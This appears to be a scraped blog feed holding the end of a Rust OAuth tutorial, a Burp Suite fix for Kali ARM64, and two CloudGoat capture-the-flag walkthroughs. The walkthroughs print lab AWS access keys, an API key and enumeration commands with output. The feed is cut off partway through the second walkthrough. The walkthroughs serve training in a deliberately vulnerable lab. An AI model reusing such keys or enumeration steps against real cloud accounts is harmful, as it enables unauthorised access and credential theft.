class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"container"</span><span class="nt">&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"icon"</span><span class="nt">&gt;</span>✓<span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;h1&gt;</span>Authorization Successful!<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;p&gt;</span>Your Google Calendar has been connected to MyHandler.<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;p&gt;</span>You can now close this window.<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <p><strong>Error Page</strong> (<code>src/oauth_pages/error.html</code>) - Shows when something goes wrong:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;title&gt;</span>Authorization Failed<span class="nt">&lt;/title&gt;</span> <span class="nt">&lt;style&gt;</span> <span class="nc">.icon</span> <span class="p">{</span> <span class="nl">background</span><span class="p">:</span> <span class="n">hsl</span><span class="p">(</span><span class="m">0</span><span class="p">,</span> <span class="m">70%</span><span class="p">,</span> <span class="m">95%</span><span class="p">);</span> <span class="nl">color</span><span class="p">:</span> <span class="n">hsl</span><span class="p">(</span><span class="m">0</span><span class="p">,</span> <span class="m">72%</span><span class="p">,</span> <span class="m">58%</span><span class="p">);</span> <span class="p">}</span> <span class="nt">&lt;/style&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"container"</span><span class="nt">&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"icon"</span><span class="nt">&gt;</span>✗<span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;h1&gt;</span>Authorization Failed<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;p&gt;</span>{{ERROR_MESSAGE}}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;p&gt;</span>Please close this window and try again.<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <p><strong>Security Error Page</strong> (<code>src/oauth_pages/security_error.html</code>) - CSRF protection triggered:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;title&gt;</span>Security Error<span class="nt">&lt;/title&gt;</span> <span class="nt">&lt;style&gt;</span> <span class="nc">.icon</span> <span class="p">{</span> <span class="nl">background</span><span class="p">:</span> <span class="n">hsl</span><span class="p">(</span><span class="m">40</span><span class="p">,</span> <span class="m">70%</span><span class="p">,</span> <span class="m">95%</span><span class="p">);</span> <span class="nl">color</span><span class="p">:</span> <span class="n">hsl</span><span class="p">(</span><span class="m">40</span><span class="p">,</span> <span class="m">90%</span><span class="p">,</span> <span class="m">50%</span><span class="p">);</span> <span class="p">}</span> <span class="nt">&lt;/style&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"container"</span><span class="nt">&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"icon"</span><span class="nt">&gt;</span>⚠<span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;h1&gt;</span>Security Error<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;p&gt;</span>Invalid state parameter. This could be a CSRF attack.<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;p&gt;</span>For your security, authorization stopped.<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <p><strong>Embed them at compile time:</strong></p> <p>In <code>google_oauth.rs</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">const</span> <span class="n">SUCCESS_HTML</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span> <span class="o">=</span> <span class="nd">include_str!</span><span class="p">(</span><span class="s">"../oauth_pages/success.html"</span><span class="p">);</span> <span class="k">const</span> <span class="n">ERROR_HTML</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span> <span class="o">=</span> <span class="nd">include_str!</span><span class="p">(</span><span class="s">"../oauth_pages/error.html"</span><span class="p">);</span> <span class="k">const</span> <span class="n">SECURITY_ERROR_HTML</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span> <span class="o">=</span> <span class="nd">include_str!</span><span class="p">(</span><span class="s">"../oauth_pages/security_error.html"</span><span class="p">);</span> </code></pre> </div> <p>This embeds the HTML directly in the binary - no external files needed!</p> <h3> Step 10: Google Cloud Console Setup </h3> <p>Here's the complete setup process:</p> <p><strong>1. Create Google Cloud Project</strong></p> <ul> <li>Go to <a href="https://console.cloud.google.com" rel="noopener noreferrer">console.cloud.google.com</a> </li> <li>Click "New Project"</li> <li>Name it (e.g., "MyHandler")</li> <li>Click "Create"</li> </ul> <p><strong>2. Enable Google Calendar API</strong></p> <ul> <li>In your project, go to "APIs &amp; Services" → "Library"</li> <li>Search for "Google Calendar API"</li> <li>Click "Enable"</li> </ul> <p><strong>3. Create OAuth Credentials</strong></p> <ul> <li>Go to "APIs &amp; Services" → "Credentials"</li> <li>Click "Create Credentials" → "OAuth 2.0 Client ID"</li> <li> <strong>Choose "Desktop app"</strong> (NOT "Web application" - this is critical!)</li> <li>Give it a name: "MyHandler Desktop Client"</li> <li>Click "Create"</li> <li> <strong>Copy the Client ID and Client Secret</strong> - you'll need these</li> </ul> <p><strong>4. Configure OAuth Consent Screen</strong></p> <ul> <li>Go to "APIs &amp; Services" → "OAuth consent screen"</li> <li>Choose "External" (unless you have Google Workspace)</li> <li>Fill in: <ul> <li>App name: "MyHandler"</li> <li>User support email: your email</li> <li>App logo: (optional)</li> <li>App domain: your website (optional during development)</li> <li>Developer contact: your email</li> </ul> </li> </ul> <p><strong>5. Add Scopes</strong></p> <ul> <li>Click "Add or Remove Scopes"</li> <li>Add: <ul> <li> <code>https://www.googleapis.com/auth/calendar.events</code> (Read/write events)</li> <li> <code>https://www.googleapis.com/auth/userinfo.email</code> (Get user email)</li> </ul> </li> <li>Click "Update"</li> </ul> <p><strong>6. Add Test Users (Development Mode)</strong></p> <ul> <li>Your app starts in "Testing" mode</li> <li>Add your email as a test user</li> <li>Once ready for public use, click "Publish App"</li> </ul> <p><strong>Key Insight:</strong> Desktop apps don't need to configure redirect URIs. Google automatically allows <strong>all localhost URLs</strong> for "Desktop app" credentials. This is different from web applications where you must whitelist specific URLs.</p> <h3> Security Considerations </h3> <p><strong>CSRF Protection:</strong></p> <ul> <li>Random 32-character state parameter prevents authorization interception</li> <li>Validated on every callback</li> <li>Used once and discarded</li> </ul> <p><strong>Token Security:</strong></p> <ul> <li>Access tokens: 1-hour expiry (short-lived)</li> <li>Refresh tokens: Long-lived (revocable by user)</li> <li>Stored in local SQLite database</li> <li>Consider encrypting the database for extra security</li> </ul> <p><strong>Network Security:</strong></p> <ul> <li>All Google API calls use HTTPS</li> <li>30-second timeouts prevent hanging</li> <li>Local server binds only to 127.0.0.1 (not accessible from network)</li> </ul> <h2> Database Schema </h2> <p>Simple single-user table:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">CREATE</span> <span class="k">TABLE</span> <span class="n">calendar_credentials</span> <span class="p">(</span> <span class="n">id</span> <span class="nb">INTEGER</span> <span class="k">PRIMARY</span> <span class="k">KEY</span> <span class="k">CHECK</span> <span class="p">(</span><span class="n">id</span> <span class="o">=</span> <span class="mi">1</span><span class="p">),</span> <span class="c1">-- Only one user</span> <span class="n">email</span> <span class="nb">VARCHAR</span><span class="p">(</span><span class="mi">255</span><span class="p">)</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">access_token</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">refresh_token</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">token_expiry</span> <span class="nb">DATETIME</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">created_at</span> <span class="nb">DATETIME</span> <span class="k">DEFAULT</span> <span class="k">CURRENT_TIMESTAMP</span><span class="p">,</span> <span class="n">updated_at</span> <span class="nb">DATETIME</span> <span class="k">DEFAULT</span> <span class="k">CURRENT_TIMESTAMP</span> <span class="p">);</span> </code></pre> </div> <p>The <code>CHECK (id = 1)</code> constraint ensures only one row exists. This is a single-user desktop app, so I don't need to handle multiple accounts (yet).</p> <p>And the corresponding Rust struct:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="nd">#[derive(Debug,</span> <span class="nd">Clone,</span> <span class="nd">Serialize,</span> <span class="nd">Deserialize)]</span> <span class="k">pub</span> <span class="k">struct</span> <span class="n">CalendarCredentials</span> <span class="p">{</span> <span class="k">pub</span> <span class="n">email</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span> <span class="k">pub</span> <span class="n">access_token</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span> <span class="k">pub</span> <span class="n">refresh_token</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span> <span class="k">pub</span> <span class="n">token_expiry</span><span class="p">:</span> <span class="n">DateTime</span><span class="o">&lt;</span><span class="n">Utc</span><span class="o">&gt;</span><span class="p">,</span> <span class="p">}</span> </code></pre> </div> <p>Simple, clean, and maps directly to the database columns. The <code>token_expiry</code> uses <code>chrono::DateTime&lt;Utc&gt;</code> for proper timezone handling.</p> <h2> The User Experience </h2> <p>From the user's perspective:</p> <ol> <li>Click "Connect Calendar" button</li> <li>Browser opens to Google</li> <li>Sign in (if needed) and click "Allow"</li> <li>See a nice success page</li> <li>Close browser tab</li> <li>Back in the app, their email shows as connected</li> </ol> <p>The whole thing takes like 10 seconds. No codes to copy, no polling, no waiting. Just works.</p> <h2> Dependencies </h2> <p>The key crates that made this possible:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight toml"><code><span class="py">tiny_http</span> <span class="p">=</span> <span class="s">"0.12"</span> <span class="c"># Lightweight HTTP server</span> <span class="py">webbrowser</span> <span class="p">=</span> <span class="s">"1.0"</span> <span class="c"># Opens browser cross-platform </span> <span class="py">reqwest</span> <span class="p">=</span> <span class="s">"0.11"</span> <span class="c"># HTTP client for API calls</span> <span class="py">serde</span> <span class="p">=</span> <span class="s">"1.0"</span> <span class="c"># JSON serialization</span> <span class="py">rand</span> <span class="p">=</span> <span class="s">"0.8"</span> <span class="c"># Random state generation</span> <span class="py">urlencoding</span> <span class="p">=</span> <span class="s">"2.1"</span> <span class="c"># URL encoding/decoding</span> </code></pre> </div> <p><code>tiny_http</code> is particularly nice - it's a simple, synchronous HTTP server.</p> <h2> Conclusion </h2> <h3> Why This Approach Works </h3> <p><strong>Fast:</strong> User clicks → browser opens → authorize → done. ~10 seconds total.</p> <p><strong>Secure:</strong> CSRF protection, HTTPS, token refresh, single-user database constraint.</p> <p><strong>Reliable:</strong> No polling, no manual code copying, no timeouts (well, 5-minute timeout but that's plenty).</p> <p><strong>Cross-Platform:</strong> Works on macOS, Windows, Linux thanks to <code>webbrowser</code> crate.</p> <p><strong>Maintainable:</strong> Clean layered architecture (commands → services → oauth → db).<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Frontend (React/TypeScript) ↓ (Tauri commands) Command Layer (calendar_commands.rs) ↓ Service Layer (calendar_service.rs) ↓ OAuth Layer (google_oauth.rs) ←→ Google APIs ↓ Database Layer (db/mod.rs) ↓ SQLite (credentials + events) </code></pre> </div> <p>Each layer has a single responsibility. Changes in one layer rarely affect others. Testing is straightforward.</p> rust tauri oauth softwaredevelopment Yar Khan Fri, 10 Oct 2025 23:00:21 +0000 https://dev.to/yarkhan02/fix-burp-suite-crashing-on-kali-arm64-apple-silicon-qemu-3d99 https://dev.to/yarkhan02/fix-burp-suite-crashing-on-kali-arm64-apple-silicon-qemu-3d99 <p>If Burp Suite instantly crashes on your Kali ARM64 VM with a <code>SIGILL (illegal instruction)</code> error, here’s the fix:</p> <p>The default OpenJDK 21 from Kali uses newer ARM instructions your emulated CPU doesn’t support under QEMU.</p> <p>Just switch to a portable Temurin 21 JRE:</p> <p>From thie official temurin GitHub repository download the version according to your suitable architecture. Like in my case the my kali architecture is ARM64.</p> <p><a href="https://github.com/adoptium/temurin21-binaries/releases" rel="noopener noreferrer">OpenJDK21U-jre_aarch64_linux_hotspot_21.0.7_6.tar.gz</a></p> <p>Move the file to /tmp folder. Then these commands:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>sudo mkdir -p /opt/temurin21 sudo tar -xzf OpenJDK21U-jre_aarch64_linux_hotspot_21.0.7_6.tar.gz -C /opt/temurin21 --strip-components=1 </code></pre> </div> <p>Test it:</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/opt/temurin21/bin/java -version JAVA_CMD=/opt/temurin21/bin/java /usr/bin/burpsuite </code></pre> </div> <p>Make Temurin the default java (affects all apps)</p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>sudo update-alternatives --install /usr/bin/java java /opt/temurin21/bin/java 1100 sudo update-alternatives --set java /opt/temurin21/bin/java java -version </code></pre> </div> <p>Tested on Apple Silicon (UTM + QEMU)</p> <p>It was bothering me so much when I switched to Mac. At first, I tried to fix the problem for days but eventually got exhausted, so I started using an alternative, Caido. After many months, I decided to try Burp Suite again to learn its features — and this time, I finally succeeded in installing it correctly.</p> kalilinux cybersecurity java learning Yar Khan Sun, 06 Jul 2025 14:22:22 +0000 https://dev.to/yarkhan02/sns-secret-walkthrough-3cnn https://dev.to/yarkhan02/sns-secret-walkthrough-3cnn <h1> SNS Secrets </h1> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>sns_user_access_key_id <span class="o">=</span> AKIAZI2LCSHNJOCUCLVC sns_user_secret_access_key <span class="o">=</span> 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 </code></pre> </div> <p>┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/sns_secrets]<br> └─# aws sts get-caller-identity --profile pw<br> {<br> "UserId": "AIDAZI2LCSHNDOON5AYNB",<br> "Account": "637423227354",<br> "Arn": "arn:aws:iam::637423227354:user/cg-sns-user-cgidrsy0favpsp"<br> }<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/sns_secrets] └─# aws sns list-topics <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"Topics"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"TopicArn"</span>: <span class="s2">"arn:aws:sns:us-east-1:637423227354:public-topic-cgidrsy0favpsp"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/sns_secrets] └─# aws sns subscribe <span class="se">\</span> <span class="nt">--topic-arn</span> arn:aws:sns:us-east-1:637423227354:public-topic-cgidrsy0favpsp <span class="se">\</span> <span class="nt">--protocol</span> email <span class="se">\</span> <span class="nt">--notification-endpoint</span> yarkhan025@gmail.com <span class="se">\</span> <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"SubscriptionArn"</span>: <span class="s2">"pending confirmation"</span> <span class="o">}</span> </code></pre> </div> <p>confirmed through the mail (might be in spams)</p> <p>received this mail after confirming</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/SNS%2520Secrets%252022850075916e8009ab59cc09057bb78b%2FScreenshot_2025-07-06_at_18.57.25.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/SNS%2520Secrets%252022850075916e8009ab59cc09057bb78b%2FScreenshot_2025-07-06_at_18.57.25.png" alt="Screenshot 2025-07-06 at 18.57.25.png" width="800" height="400"></a><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/sns_secrets] └─# aws apigateway get-rest-apis <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"items"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"id"</span>: <span class="s2">"3mr2ebz0ak"</span>, <span class="s2">"name"</span>: <span class="s2">"cg-api-cgidrsy0favpsp"</span>, <span class="s2">"description"</span>: <span class="s2">"API for demonstrating leaked API key scenario"</span>, <span class="s2">"createdDate"</span>: <span class="s2">"2025-07-06T18:36:09+05:00"</span>, <span class="s2">"apiKeySource"</span>: <span class="s2">"HEADER"</span>, <span class="s2">"endpointConfiguration"</span>: <span class="o">{</span> <span class="s2">"types"</span>: <span class="o">[</span> <span class="s2">"EDGE"</span> <span class="o">]</span>, <span class="s2">"ipAddressType"</span>: <span class="s2">"ipv4"</span> <span class="o">}</span>, <span class="s2">"tags"</span>: <span class="o">{</span> <span class="s2">"Scenario"</span>: <span class="s2">"iam_privesc_by_key_rotation"</span>, <span class="s2">"Stack"</span>: <span class="s2">"CloudGoat"</span> <span class="o">}</span>, <span class="s2">"disableExecuteApiEndpoint"</span>: <span class="nb">false</span>, <span class="s2">"rootResourceId"</span>: <span class="s2">"rj90ky2wv8"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> ┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/sns_secrets] └─# aws apigateway get-stages <span class="se">\</span> <span class="nt">--rest-api-id</span> 3mr2ebz0ak <span class="se">\</span> <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"item"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"deploymentId"</span>: <span class="s2">"x3k470"</span>, <span class="s2">"stageName"</span>: <span class="s2">"prod-cgidrsy0favpsp"</span>, <span class="s2">"cacheClusterEnabled"</span>: <span class="nb">false</span>, <span class="s2">"cacheClusterStatus"</span>: <span class="s2">"NOT_AVAILABLE"</span>, <span class="s2">"methodSettings"</span>: <span class="o">{}</span>, <span class="s2">"tracingEnabled"</span>: <span class="nb">false</span>, <span class="s2">"tags"</span>: <span class="o">{</span> <span class="s2">"Scenario"</span>: <span class="s2">"iam_privesc_by_key_rotation"</span>, <span class="s2">"Stack"</span>: <span class="s2">"CloudGoat"</span> <span class="o">}</span>, <span class="s2">"createdDate"</span>: <span class="s2">"2025-07-06T18:36:13+05:00"</span>, <span class="s2">"lastUpdatedDate"</span>: <span class="s2">"2025-07-06T18:36:13+05:00"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/sns_secrets] └─# aws apigateway get-usage-plans <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"items"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"id"</span>: <span class="s2">"0qtwst"</span>, <span class="s2">"name"</span>: <span class="s2">"cg-usage-plan-cgidrsy0favpsp"</span>, <span class="s2">"apiStages"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"apiId"</span>: <span class="s2">"3mr2ebz0ak"</span>, <span class="s2">"stage"</span>: <span class="s2">"prod-cgidrsy0favpsp"</span> <span class="o">}</span> <span class="o">]</span>, <span class="s2">"tags"</span>: <span class="o">{</span> <span class="s2">"Scenario"</span>: <span class="s2">"iam_privesc_by_key_rotation"</span>, <span class="s2">"Stack"</span>: <span class="s2">"CloudGoat"</span> <span class="o">}</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/sns_secrets] └─# aws apigateway get-resources <span class="se">\</span> <span class="nt">--rest-api-id</span> 3mr2ebz0ak <span class="se">\</span> <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"items"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"id"</span>: <span class="s2">"4br17j"</span>, <span class="s2">"parentId"</span>: <span class="s2">"rj90ky2wv8"</span>, <span class="s2">"pathPart"</span>: <span class="s2">"user-data"</span>, <span class="s2">"path"</span>: <span class="s2">"/user-data"</span>, <span class="s2">"resourceMethods"</span>: <span class="o">{</span> <span class="s2">"GET"</span>: <span class="o">{}</span> <span class="o">}</span> <span class="o">}</span>, <span class="o">{</span> <span class="s2">"id"</span>: <span class="s2">"rj90ky2wv8"</span>, <span class="s2">"path"</span>: <span class="s2">"/"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl https://3mr2ebz0ak.execute-api.us-east-1.amazonaws.com/prod-cgidrsy0favpsp/user-data <span class="nt">-H</span> <span class="s1">'x-api-key: 45a3da610dc 64703b10e273a4db135bf'</span> <span class="o">{</span><span class="s2">"final_flag"</span>: <span class="s2">"FLAG{SNS_S3r3ts_ar3_FUN}"</span>, <span class="s2">"message"</span> : <span class="s2">"Access granted"</span> , <span class="s2">"user_data"</span> : <span class="o">{</span><span class="s2">"email"</span>: <span class="s2">"SuperAdmin@notarealemail.co m"</span>, <span class="s2">"password"</span>: <span class="s2">"p@sswOrd123"</span>, <span class="s2">"user_id"</span>: <span class="s2">"1337"</span>, <span class="s2">"username"</span> : <span class="s2">"SuperAdmin"</span><span class="o">}}</span> </code></pre> </div> cloud python aws infosec Yar Khan Sun, 06 Jul 2025 12:38:22 +0000 https://dev.to/yarkhan02/cloudgoat-beanstalksecrets-walkthrough-2i47 https://dev.to/yarkhan02/cloudgoat-beanstalksecrets-walkthrough-2i47 <h2> Beanstalk Secrets </h2> <p>Automatically whitelists your IP to allow access to the vulnerable CloudGoat scenario.</p> <p>┌──(root㉿yarkhan)-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets]<br> └─# cloudgoat config whitelist --auto<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>initial_low_priv_credentials <span class="o">=</span> Access Key: AKIAZI2LCSHNOWPG26FR Secret Key: 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 </code></pre> </div> <p>Confirms current AWS identity (low-priv user: <code>cgidrddh9uxljn_low_priv_user</code>).<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws sts get-caller-identity <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"UserId"</span>: <span class="s2">"AIDAZI2LCSHNL62NPKJBK"</span>, <span class="s2">"Account"</span>: <span class="s2">"637423227354"</span>, <span class="s2">"Arn"</span>: <span class="s2">"arn:aws:iam::637423227354:user/cgidrddh9uxljn_low_priv_user"</span> <span class="o">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws <span class="nb">help</span> ┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws elasticbeanstalk <span class="nb">help</span> </code></pre> </div> <p>Retrieves environment ID and endpoint URL for the active Beanstalk application.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws elasticbeanstalk describe-environments <span class="nt">--profile</span> pw <span class="o">{</span> <span class="o">{</span> <span class="s2">"Environments"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"EnvironmentName"</span>: <span class="s2">"cgidrddh9uxljn-env"</span>, <span class="s2">"EnvironmentId"</span>: <span class="s2">"e-nphm6qpyc2"</span>, <span class="s2">"ApplicationName"</span>: <span class="s2">"cgidrddh9uxljn-app"</span>, <span class="s2">"SolutionStackName"</span>: <span class="s2">"64bit Amazon Linux 2023 v4.6.0 running Python 3.11"</span>, <span class="s2">"PlatformArn"</span>: <span class="s2">"arn:aws:elasticbeanstalk:us-east-1::platform/Python 3.11 running on 64bit Amazon Linux 2023/4.6.0"</span>, <span class="s2">"EndpointURL"</span>: <span class="s2">"awseb-e-n-AWSEBLoa-114Z7VERU1JC9-508425660.us-east-1.elb.amazonaws.com"</span>, <span class="s2">"CNAME"</span>: <span class="s2">"cgidrddh9uxljn-env.eba-ypbpr8em.us-east-1.elasticbeanstalk.com"</span>, <span class="s2">"DateCreated"</span>: <span class="s2">"2025-07-06T07:58:12.268000+00:00"</span>, <span class="s2">"DateUpdated"</span>: <span class="s2">"2025-07-06T08:01:26.202000+00:00"</span>, <span class="s2">"Status"</span>: <span class="s2">"Ready"</span>, <span class="s2">"AbortableOperationInProgress"</span>: <span class="nb">false</span>, <span class="s2">"Health"</span>: <span class="s2">"Grey"</span>, <span class="s2">"HealthStatus"</span>: <span class="s2">"Pending"</span>, <span class="s2">"Tier"</span>: <span class="o">{</span> <span class="s2">"Name"</span>: <span class="s2">"WebServer"</span>, <span class="s2">"Type"</span>: <span class="s2">"Standard"</span>, <span class="s2">"Version"</span>: <span class="s2">"1.0"</span> <span class="o">}</span>, <span class="s2">"EnvironmentLinks"</span>: <span class="o">[]</span>, <span class="s2">"EnvironmentArn"</span>: <span class="s2">"arn:aws:elasticbeanstalk:us-east-1:637423227354:environment/cgidrddh9uxljn-app/cgidrddh9uxljn-env"</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> </code></pre> </div> <p>Retrieves the name and metadata of the Beanstalk application.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws elasticbeanstalk describe-applications <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"Applications"</span>: <span class="o">[</span> <span class="o">{</span> <span class="s2">"ApplicationArn"</span>: <span class="s2">"arn:aws:elasticbeanstalk:us-east-1:637423227354:application/cgidrddh9uxljn-app"</span>, <span class="s2">"ApplicationName"</span>: <span class="s2">"cgidrddh9uxljn-app"</span>, <span class="s2">"Description"</span>: <span class="s2">"Elastic Beanstalk application for insecure secrets scenario"</span>, <span class="s2">"DateCreated"</span>: <span class="s2">"2025-07-06T07:57:55.841000+00:00"</span>, <span class="s2">"DateUpdated"</span>: <span class="s2">"2025-07-06T07:57:55.841000+00:00"</span>, <span class="s2">"ConfigurationTemplates"</span>: <span class="o">[]</span>, <span class="s2">"ResourceLifecycleConfig"</span>: <span class="o">{</span> <span class="s2">"VersionLifecycleConfig"</span>: <span class="o">{</span> <span class="s2">"MaxCountRule"</span>: <span class="o">{</span> <span class="s2">"Enabled"</span>: <span class="nb">false</span>, <span class="s2">"MaxCount"</span>: 200, <span class="s2">"DeleteSourceFromS3"</span>: <span class="nb">false</span> <span class="o">}</span>, <span class="s2">"MaxAgeRule"</span>: <span class="o">{</span> <span class="s2">"Enabled"</span>: <span class="nb">false</span>, <span class="s2">"MaxAgeInDays"</span>: 180, <span class="s2">"DeleteSourceFromS3"</span>: <span class="nb">false</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> <span class="o">]</span> <span class="o">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws elasticbeanstalk describe-application-versions <span class="nt">--application-name</span> cgidrddh9uxljn-app <span class="nt">--version-label</span> <span class="s2">"v1"</span> <span class="nt">--profile</span> pw <span class="o">{</span> <span class="s2">"ApplicationVersions"</span>: <span class="o">[]</span> <span class="o">}</span> </code></pre> </div> <p>Leaks environment variables including exposed AWS credentials for a higher-privileged user.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>┌──<span class="o">(</span>root㉿yarkhan<span class="o">)</span>-[/home/yarkhan/Documents/cloudgoat/beanstalk_secrets] └─# aws elasticbeanstalk describe-configuration-settings <span class="nt">--environment-name</span> cgidrddh9uxljn-env <span class="nt">--application-name</span> cgidrddh9uxljn-app <span class="nt">--profile</span> pw | jq <span class="s1">'.ConfigurationSettings[0].OptionSettings[] | select(.Namespace=="aws:elasticbeanstalk:application:environment")'</span> <span class="o">{</span> <span class="s2">"Namespace"</span>: <span class="s2">"aws:elasticbeanstalk:application:environment"</span>, <span class="s2">"OptionName"</span>: <span class="s2">"PYTHONPATH"</span>, <span class="s2">"Value"</span>: <span class="s2">"/var/app/venv/staging-LQM1lest/bin"</span> <span class="o">}</span> <span class="o">{</span> <span class="s2">"Namespace"</span>: <span class="s2">"aws:elasticbeanstalk:application:environment"</span>, <span 